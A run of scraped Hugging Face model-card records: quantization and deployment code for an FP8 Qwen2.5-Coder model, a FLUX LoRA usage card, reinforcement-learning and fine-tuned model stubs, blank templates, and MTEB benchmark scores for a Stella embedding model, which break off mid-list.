from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="anasse15/MNLP_M3_rag_model_single_token", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/anasse-elboudiri-epfl/huggingface/runs/2nw0q69q)
This model was trained with SFT.
### Framework versions
- TRL: 0.18.1
- Transformers: 4.52.3
- Pytorch: 2.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
duydq12/Qwen2.5-Coder-3B-Instruct-FP8-dynamic | duydq12 | 2025-06-09T10:27:22Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"llmcompressor",
"quantized",
"FP8",
"conversational",
"base_model:Qwen/Qwen2.5-Coder-3B-Instruct",
"base_model:quantized:Qwen/Qwen2.5-Coder-3B-Instruct",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"... | text-generation | 2025-06-09T10:22:50Z | ---
library_name: transformers
license: apache-2.0
pipeline_tag: text-generation
base_model:
- Qwen/Qwen2.5-Coder-3B-Instruct
tags:
- llmcompressor
- quantized
- FP8
---
# Qwen2.5-Coder-3B-Instruct-FP8-dynamic
## Model Overview
- **Model Architecture:** Qwen2ForCausalLM
- **Input:** Text
- **Output:** Text
- **Model Optimizations:**
- **Activation quantization:** FP8
- **Weight quantization:** FP8
- **Release Date:** 09/06/2025
- **Version:** 1.0
- **Model Developers:** duydq12 (enhanced by RedHatAI)
### Model Optimizations
This model was obtained by quantizing activations and weights of [Qwen2.5-Coder-3B-Instruct](https://huggingface.co/Qwen/Qwen2.5-Coder-3B-Instruct) to FP8 data type.
This optimization reduces the number of bits used to represent weights and activations from 16 to 8, reducing GPU memory requirements (by approximately 50%) and increasing matrix-multiply compute throughput (by approximately 2x).
Weight quantization also reduces disk size requirements by approximately 50%.
Only weights and activations of the linear operators within transformers blocks are quantized.
Weights are quantized with a symmetric static per-channel scheme, whereas activations are quantized with a symmetric dynamic per-token scheme.
The [llm-compressor](https://github.com/vllm-project/llm-compressor) library is used for quantization.
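To make the scheme above concrete, here is a small pure-Python sketch of symmetric dynamic per-token quantization. This is a toy illustration, not llm-compressor's actual implementation: each activation row (token) gets its own scale from its max absolute value and is mapped into the FP8 E4M3 range of ±448, with integer rounding standing in for E4M3's coarser, exponent-dependent rounding.

```python
FP8_E4M3_MAX = 448.0  # largest magnitude representable in FP8 E4M3

def quantize_per_token(rows, qmax=FP8_E4M3_MAX):
    """One scale per row (token), computed at runtime from that row's max."""
    out = []
    for row in rows:
        amax = max(abs(v) for v in row) or 1.0  # guard all-zero rows
        scale = amax / qmax
        q = [max(-qmax, min(qmax, round(v / scale))) for v in row]
        out.append((q, scale))
    return out

def dequantize(quantized):
    return [[v * scale for v in q] for q, scale in quantized]

activations = [[0.1, -2.0, 0.5], [10.0, 3.0, -7.0]]
reconstructed = dequantize(quantize_per_token(activations))
```

The static per-channel weight scheme is the same idea applied to weight channels, with scales fixed once at compression time rather than recomputed per token.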
## Deployment
This model can be deployed efficiently using the [vLLM](https://docs.vllm.ai/en/latest/) backend, as shown in the example below.
```python
from vllm import LLM, SamplingParams
from transformers import AutoTokenizer
model_id = "duydq12/Qwen2.5-Coder-3B-Instruct-FP8-dynamic"
number_gpus = 1
sampling_params = SamplingParams(temperature=0.6, top_p=0.95, top_k=20, min_p=0, max_tokens=256)
tokenizer = AutoTokenizer.from_pretrained(model_id)
messages = [{"role": "user", "content": "Give me a short introduction to large language models."}]
prompts = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=False)
llm = LLM(model=model_id, tensor_parallel_size=number_gpus)
outputs = llm.generate(prompts, sampling_params)
generated_text = outputs[0].outputs[0].text
print(generated_text)
```
vLLM also supports OpenAI-compatible serving. See the [documentation](https://docs.vllm.ai/en/latest/) for more details.
## Creation
<details>
<summary>Creation details</summary>
This model was created with [llm-compressor](https://github.com/vllm-project/llm-compressor) by running the code snippet below.
```python
from llmcompressor.modifiers.quantization import QuantizationModifier
from llmcompressor.transformers import oneshot
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model
model_stub = "Qwen/Qwen2.5-Coder-3B-Instruct"
model_name = model_stub.split("/")[-1]
model = AutoModelForCausalLM.from_pretrained(model_stub, torch_dtype="auto", device_map="auto")
tokenizer = AutoTokenizer.from_pretrained(model_stub, torch_dtype="auto", device_map="auto")
# Configure the quantization algorithm and scheme
recipe = QuantizationModifier(
ignore=["lm_head"],
targets="Linear",
scheme="FP8_dynamic",
)
# Apply quantization
oneshot(
model=model,
recipe=recipe,
)
# Save to disk in compressed-tensors format
save_path = model_name + "-FP8-dynamic"
model.save_pretrained(save_path)
tokenizer.save_pretrained(save_path)
print(f"Model and tokenizer saved to: {save_path}")
```
</details>
## Evaluation
private
### Accuracy
private
|
IntMeGroup/CompBench_Perception_difficult | IntMeGroup | 2025-06-09T10:23:34Z | 0 | 0 | null | [
"tensorboard",
"safetensors",
"internvl_chat",
"custom_code",
"license:apache-2.0",
"region:us"
] | null | 2025-06-09T06:54:23Z | ---
license: apache-2.0
---
|
Tsegayesemere/emotion-xlm-r-tigrigna_1 | Tsegayesemere | 2025-06-09T10:22:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T10:22:01Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
dhadheechi/a2c-PandaPickAndPlace-v3 | dhadheechi | 2025-06-09T10:21:42Z | 0 | 0 | stable-baselines3 | [
"stable-baselines3",
"PandaPickAndPlace-v3",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T10:17:32Z | ---
library_name: stable-baselines3
tags:
- PandaPickAndPlace-v3
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: A2C
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: PandaPickAndPlace-v3
type: PandaPickAndPlace-v3
metrics:
- type: mean_reward
value: -50.00 +/- 0.00
name: mean_reward
verified: false
---
# **A2C** Agent playing **PandaPickAndPlace-v3**
This is a trained model of an **A2C** agent playing **PandaPickAndPlace-v3**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3).
## Usage (with Stable-baselines3)
A minimal loading sketch. The checkpoint filename below follows the usual `<algo>-<env>.zip` upload convention and is an assumption — check the repository's file list:
```python
from stable_baselines3 import A2C
from huggingface_sb3 import load_from_hub

# Download the checkpoint from the Hub (filename assumed from the SB3 convention)
checkpoint = load_from_hub(
    repo_id="dhadheechi/a2c-PandaPickAndPlace-v3",
    filename="a2c-PandaPickAndPlace-v3.zip",
)
model = A2C.load(checkpoint)
```
|
thejaminator/medium_high-4e-05-4000-llama | thejaminator | 2025-06-09T10:15:35Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"base_model:unsloth/DeepSeek-R1-Distill-Llama-8B",
"base_model:finetune:unsloth/DeepSeek-R1-Distill-Llama-8B",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T10:15:26Z | ---
base_model: unsloth/DeepSeek-R1-Distill-Llama-8B
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** thejaminator
- **License:** apache-2.0
- **Finetuned from model:** unsloth/DeepSeek-R1-Distill-Llama-8B
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya | BootesVoid | 2025-06-09T09:57:40Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-06-09T09:57:39Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: NUKY
---
# Cmbmj8Zyy012Eekg04Fc7My0F_Cmbov7Vku04Goekg00Cvgfvya
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `NUKY` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "NUKY",
"lora_weights": "https://huggingface.co/BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya', weight_name='lora.safetensors')
image = pipeline('NUKY').images[0]
```
For more details, including weighting, merging, and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters).
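As one example of weight control, here is a sketch that fuses the LoRA into the base weights at reduced strength. It uses diffusers' `fuse_lora`; the 0.8 scale is an arbitrary illustration, not a value from this card:

```python
def load_fused_pipeline(lora_scale: float = 0.8):
    # Imports are kept local so the sketch can be read without the libraries installed.
    import torch
    from diffusers import AutoPipelineForText2Image

    pipe = AutoPipelineForText2Image.from_pretrained(
        "black-forest-labs/FLUX.1-dev", torch_dtype=torch.float16
    ).to("cuda")
    pipe.load_lora_weights(
        "BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya",
        weight_name="lora.safetensors",
    )
    # Bake the scaled LoRA into the base weights; the adapter then
    # no longer needs to be kept loaded separately.
    pipe.fuse_lora(lora_scale=lora_scale)
    return pipe
```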
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya/discussions) to add images that show off what you’ve made with this LoRA.
|
yankaiwang/RLOO_20250609-024843 | yankaiwang | 2025-06-09T09:49:30Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T09:48:43Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
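Since the card's tags list a `qwen2` text-generation checkpoint, a minimal sketch using the standard transformers API may help until the authors fill this in. Everything below is an assumption following the usual causal-LM pattern, not code from the original card:

```python
# Hedged sketch: load the checkpoint with the standard transformers API.
REPO_ID = "yankaiwang/RLOO_20250609-024843"

def generate(prompt: str, max_new_tokens: int = 64) -> str:
    # Imports kept local so this file can be inspected without transformers installed.
    from transformers import AutoModelForCausalLM, AutoTokenizer

    tokenizer = AutoTokenizer.from_pretrained(REPO_ID)
    model = AutoModelForCausalLM.from_pretrained(REPO_ID, device_map="auto")
    inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
    output_ids = model.generate(**inputs, max_new_tokens=max_new_tokens)
    # Decode only the newly generated tokens, not the echoed prompt.
    return tokenizer.decode(
        output_ids[0][inputs["input_ids"].shape[1]:], skip_special_tokens=True
    )

if __name__ == "__main__":
    print(generate("Write a haiku about reinforcement learning."))
```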
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
kalle07/stella-base-en-v2-Q8_0-GGUF | kalle07 | 2025-06-09T09:48:17Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"gguf",
"feature-extraction",
"sentence-similarity",
"mteb",
"llama-cpp",
"gguf-my-repo",
"en",
"base_model:infgrad/stella-base-en-v2",
"base_model:quantized:infgrad/stella-base-en-v2",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
... | feature-extraction | 2025-06-09T09:48:14Z | ---
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- mteb
- llama-cpp
- gguf-my-repo
language:
- en
license: mit
base_model: infgrad/stella-base-en-v2
model-index:
- name: stella-base-en-v2
results:
- task:
type: Classification
dataset:
name: MTEB AmazonCounterfactualClassification (en)
type: mteb/amazon_counterfactual
config: en
split: test
revision: e8379541af4e31359cca9fbcf4b00f2671dba205
metrics:
- type: accuracy
value: 77.19402985074628
- type: ap
value: 40.43267503017359
- type: f1
value: 71.15585210518594
- task:
type: Classification
dataset:
name: MTEB AmazonPolarityClassification
type: mteb/amazon_polarity
config: default
split: test
revision: e2d317d38cd51312af73b3d32a06d1a08b442046
metrics:
- type: accuracy
value: 93.256675
- type: ap
value: 90.00824833079179
- type: f1
value: 93.2473146151734
- task:
type: Classification
dataset:
name: MTEB AmazonReviewsClassification (en)
type: mteb/amazon_reviews_multi
config: en
split: test
revision: 1399c76144fd37290681b995c656ef9b2e06e26d
metrics:
- type: accuracy
value: 49.612
- type: f1
value: 48.530785631574304
- task:
type: Retrieval
dataset:
name: MTEB ArguAna
type: arguana
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 37.411
- type: map_at_10
value: 52.673
- type: map_at_100
value: 53.410999999999994
- type: map_at_1000
value: 53.415
- type: map_at_3
value: 48.495
- type: map_at_5
value: 51.183
- type: mrr_at_1
value: 37.838
- type: mrr_at_10
value: 52.844
- type: mrr_at_100
value: 53.581999999999994
- type: mrr_at_1000
value: 53.586
- type: mrr_at_3
value: 48.672
- type: mrr_at_5
value: 51.272
- type: ndcg_at_1
value: 37.411
- type: ndcg_at_10
value: 60.626999999999995
- type: ndcg_at_100
value: 63.675000000000004
- type: ndcg_at_1000
value: 63.776999999999994
- type: ndcg_at_3
value: 52.148
- type: ndcg_at_5
value: 57.001999999999995
- type: precision_at_1
value: 37.411
- type: precision_at_10
value: 8.578
- type: precision_at_100
value: 0.989
- type: precision_at_1000
value: 0.1
- type: precision_at_3
value: 20.91
- type: precision_at_5
value: 14.908
- type: recall_at_1
value: 37.411
- type: recall_at_10
value: 85.775
- type: recall_at_100
value: 98.86200000000001
- type: recall_at_1000
value: 99.644
- type: recall_at_3
value: 62.731
- type: recall_at_5
value: 74.53800000000001
- task:
type: Clustering
dataset:
name: MTEB ArxivClusteringP2P
type: mteb/arxiv-clustering-p2p
config: default
split: test
revision: a122ad7f3f0291bf49cc6f4d32aa80929df69d5d
metrics:
- type: v_measure
value: 47.24219029437865
- task:
type: Clustering
dataset:
name: MTEB ArxivClusteringS2S
type: mteb/arxiv-clustering-s2s
config: default
split: test
revision: f910caf1a6075f7329cdf8c1a6135696f37dbd53
metrics:
- type: v_measure
value: 40.474604844291726
- task:
type: Reranking
dataset:
name: MTEB AskUbuntuDupQuestions
type: mteb/askubuntudupquestions-reranking
config: default
split: test
revision: 2000358ca161889fa9c082cb41daa8dcfb161a54
metrics:
- type: map
value: 62.720542706366054
- type: mrr
value: 75.59633733456448
- task:
type: STS
dataset:
name: MTEB BIOSSES
type: mteb/biosses-sts
config: default
split: test
revision: d3fb88f8f02e40887cd149695127462bbcf29b4a
metrics:
- type: cos_sim_pearson
value: 86.31345008397868
- type: cos_sim_spearman
value: 85.94292212320399
- type: euclidean_pearson
value: 85.03974302774525
- type: euclidean_spearman
value: 85.88087251659051
- type: manhattan_pearson
value: 84.91900996712951
- type: manhattan_spearman
value: 85.96701905781116
- task:
type: Classification
dataset:
name: MTEB Banking77Classification
type: mteb/banking77
config: default
split: test
revision: 0fd18e25b25c072e09e0d92ab615fda904d66300
metrics:
- type: accuracy
value: 84.72727272727273
- type: f1
value: 84.29572512364581
- task:
type: Clustering
dataset:
name: MTEB BiorxivClusteringP2P
type: mteb/biorxiv-clustering-p2p
config: default
split: test
revision: 65b79d1d13f80053f67aca9498d9402c2d9f1f40
metrics:
- type: v_measure
value: 39.55532460397536
- task:
type: Clustering
dataset:
name: MTEB BiorxivClusteringS2S
type: mteb/biorxiv-clustering-s2s
config: default
split: test
revision: 258694dd0231531bc1fd9de6ceb52a0853c6d908
metrics:
- type: v_measure
value: 35.91195973591251
- task:
type: Retrieval
dataset:
name: MTEB CQADupstackAndroidRetrieval
type: BeIR/cqadupstack
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 32.822
- type: map_at_10
value: 44.139
- type: map_at_100
value: 45.786
- type: map_at_1000
value: 45.906000000000006
- type: map_at_3
value: 40.637
- type: map_at_5
value: 42.575
- type: mrr_at_1
value: 41.059
- type: mrr_at_10
value: 50.751000000000005
- type: mrr_at_100
value: 51.548
- type: mrr_at_1000
value: 51.583999999999996
- type: mrr_at_3
value: 48.236000000000004
- type: mrr_at_5
value: 49.838
- type: ndcg_at_1
value: 41.059
- type: ndcg_at_10
value: 50.573
- type: ndcg_at_100
value: 56.25
- type: ndcg_at_1000
value: 58.004
- type: ndcg_at_3
value: 45.995000000000005
- type: ndcg_at_5
value: 48.18
- type: precision_at_1
value: 41.059
- type: precision_at_10
value: 9.757
- type: precision_at_100
value: 1.609
- type: precision_at_1000
value: 0.20600000000000002
- type: precision_at_3
value: 22.222
- type: precision_at_5
value: 16.023
- type: recall_at_1
value: 32.822
- type: recall_at_10
value: 61.794000000000004
- type: recall_at_100
value: 85.64699999999999
- type: recall_at_1000
value: 96.836
- type: recall_at_3
value: 47.999
- type: recall_at_5
value: 54.376999999999995
- type: map_at_1
value: 29.579
- type: map_at_10
value: 39.787
- type: map_at_100
value: 40.976
- type: map_at_1000
value: 41.108
- type: map_at_3
value: 36.819
- type: map_at_5
value: 38.437
- type: mrr_at_1
value: 37.516
- type: mrr_at_10
value: 45.822
- type: mrr_at_100
value: 46.454
- type: mrr_at_1000
value: 46.495999999999995
- type: mrr_at_3
value: 43.556
- type: mrr_at_5
value: 44.814
- type: ndcg_at_1
value: 37.516
- type: ndcg_at_10
value: 45.5
- type: ndcg_at_100
value: 49.707
- type: ndcg_at_1000
value: 51.842
- type: ndcg_at_3
value: 41.369
- type: ndcg_at_5
value: 43.161
- type: precision_at_1
value: 37.516
- type: precision_at_10
value: 8.713
- type: precision_at_100
value: 1.38
- type: precision_at_1000
value: 0.188
- type: precision_at_3
value: 20.233999999999998
- type: precision_at_5
value: 14.280000000000001
- type: recall_at_1
value: 29.579
- type: recall_at_10
value: 55.458
- type: recall_at_100
value: 73.49799999999999
- type: recall_at_1000
value: 87.08200000000001
- type: recall_at_3
value: 42.858000000000004
- type: recall_at_5
value: 48.215
- type: map_at_1
value: 40.489999999999995
- type: map_at_10
value: 53.313
- type: map_at_100
value: 54.290000000000006
- type: map_at_1000
value: 54.346000000000004
- type: map_at_3
value: 49.983
- type: map_at_5
value: 51.867
- type: mrr_at_1
value: 46.27
- type: mrr_at_10
value: 56.660999999999994
- type: mrr_at_100
value: 57.274
- type: mrr_at_1000
value: 57.301
- type: mrr_at_3
value: 54.138
- type: mrr_at_5
value: 55.623999999999995
- type: ndcg_at_1
value: 46.27
- type: ndcg_at_10
value: 59.192
- type: ndcg_at_100
value: 63.026
- type: ndcg_at_1000
value: 64.079
- type: ndcg_at_3
value: 53.656000000000006
- type: ndcg_at_5
value: 56.387
- type: precision_at_1
value: 46.27
- type: precision_at_10
value: 9.511
- type: precision_at_100
value: 1.23
- type: precision_at_1000
value: 0.136
- type: precision_at_3
value: 24.096
- type: precision_at_5
value: 16.476
- type: recall_at_1
value: 40.489999999999995
- type: recall_at_10
value: 73.148
- type: recall_at_100
value: 89.723
- type: recall_at_1000
value: 97.073
- type: recall_at_3
value: 58.363
- type: recall_at_5
value: 65.083
- type: map_at_1
value: 26.197
- type: map_at_10
value: 35.135
- type: map_at_100
value: 36.14
- type: map_at_1000
value: 36.216
- type: map_at_3
value: 32.358
- type: map_at_5
value: 33.814
- type: mrr_at_1
value: 28.475
- type: mrr_at_10
value: 37.096000000000004
- type: mrr_at_100
value: 38.006
- type: mrr_at_1000
value: 38.06
- type: mrr_at_3
value: 34.52
- type: mrr_at_5
value: 35.994
- type: ndcg_at_1
value: 28.475
- type: ndcg_at_10
value: 40.263
- type: ndcg_at_100
value: 45.327
- type: ndcg_at_1000
value: 47.225
- type: ndcg_at_3
value: 34.882000000000005
- type: ndcg_at_5
value: 37.347
- type: precision_at_1
value: 28.475
- type: precision_at_10
value: 6.249
- type: precision_at_100
value: 0.919
- type: precision_at_1000
value: 0.11199999999999999
- type: precision_at_3
value: 14.689
- type: precision_at_5
value: 10.237
- type: recall_at_1
value: 26.197
- type: recall_at_10
value: 54.17999999999999
- type: recall_at_100
value: 77.768
- type: recall_at_1000
value: 91.932
- type: recall_at_3
value: 39.804
- type: recall_at_5
value: 45.660000000000004
- type: map_at_1
value: 16.683
- type: map_at_10
value: 25.013999999999996
- type: map_at_100
value: 26.411
- type: map_at_1000
value: 26.531
- type: map_at_3
value: 22.357
- type: map_at_5
value: 23.982999999999997
- type: mrr_at_1
value: 20.896
- type: mrr_at_10
value: 29.758000000000003
- type: mrr_at_100
value: 30.895
- type: mrr_at_1000
value: 30.964999999999996
- type: mrr_at_3
value: 27.177
- type: mrr_at_5
value: 28.799999999999997
- type: ndcg_at_1
value: 20.896
- type: ndcg_at_10
value: 30.294999999999998
- type: ndcg_at_100
value: 36.68
- type: ndcg_at_1000
value: 39.519
- type: ndcg_at_3
value: 25.480999999999998
- type: ndcg_at_5
value: 28.027
- type: precision_at_1
